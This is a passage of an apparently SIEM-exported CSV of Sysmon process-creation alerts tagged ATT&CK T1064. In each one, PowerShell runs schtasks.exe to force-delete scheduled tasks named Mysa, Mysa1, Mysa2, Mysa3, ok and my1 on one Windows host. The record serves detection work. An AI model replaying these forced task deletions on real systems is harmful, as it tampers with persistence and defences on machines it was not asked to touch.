Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.486",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:06.526 +ProcessGuid: {df9fc3d3-b3f6-5ecf-0000-00105ec12e00} +ProcessId: 7800 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ok /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ok /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:06.532053800Z"",""eventRecordID"":""3537"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:06.526\r\nProcessGuid: {df9fc3d3-b3f6-5ecf-0000-00105ec12e00}\r\nProcessId: 7800\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ok /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:06.526"",""processGuid"":""{df9fc3d3-b3f6-5ecf-0000-00105ec12e00}"",""processId"":""7800"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ok /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.469",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:06.393 +ProcessGuid: {df9fc3d3-b3f6-5ecf-0000-001070bf2e00} +ProcessId: 1528 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:06.458662400Z"",""eventRecordID"":""3536"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:06.393\r\nProcessGuid: {df9fc3d3-b3f6-5ecf-0000-001070bf2e00}\r\nProcessId: 1528\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:06.393"",""processGuid"":""{df9fc3d3-b3f6-5ecf-0000-001070bf2e00}"",""processId"":""1528"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.453",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:06.155 +ProcessGuid: {df9fc3d3-b3f6-5ecf-0000-0010d0bc2e00} +ProcessId: 7284 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:06.155685200Z"",""eventRecordID"":""3535"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:06.155\r\nProcessGuid: {df9fc3d3-b3f6-5ecf-0000-0010d0bc2e00}\r\nProcessId: 7284\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:06.155"",""processGuid"":""{df9fc3d3-b3f6-5ecf-0000-0010d0bc2e00}"",""processId"":""7284"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.440",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:05.827 +ProcessGuid: {df9fc3d3-b3f5-5ecf-0000-001015ba2e00} +ProcessId: 8016 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:05.827884200Z"",""eventRecordID"":""3534"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:05.827\r\nProcessGuid: {df9fc3d3-b3f5-5ecf-0000-001015ba2e00}\r\nProcessId: 8016\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:05.827"",""processGuid"":""{df9fc3d3-b3f5-5ecf-0000-001015ba2e00}"",""processId"":""8016"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.426",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:05.653 +ProcessGuid: {df9fc3d3-b3f5-5ecf-0000-0010e4b72e00} +ProcessId: 1676 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:05.718185700Z"",""eventRecordID"":""3533"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:05.653\r\nProcessGuid: {df9fc3d3-b3f5-5ecf-0000-0010e4b72e00}\r\nProcessId: 1676\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:05.653"",""processGuid"":""{df9fc3d3-b3f5-5ecf-0000-0010e4b72e00}"",""processId"":""1676"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.382",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:05.485 +ProcessGuid: {df9fc3d3-b3f5-5ecf-0000-0010b8b52e00} +ProcessId: 3540 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN my1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:05.527454900Z"",""eventRecordID"":""3532"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:05.485\r\nProcessGuid: {df9fc3d3-b3f5-5ecf-0000-0010b8b52e00}\r\nProcessId: 3540\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:05.485"",""processGuid"":""{df9fc3d3-b3f5-5ecf-0000-0010b8b52e00}"",""processId"":""3540"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN my1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 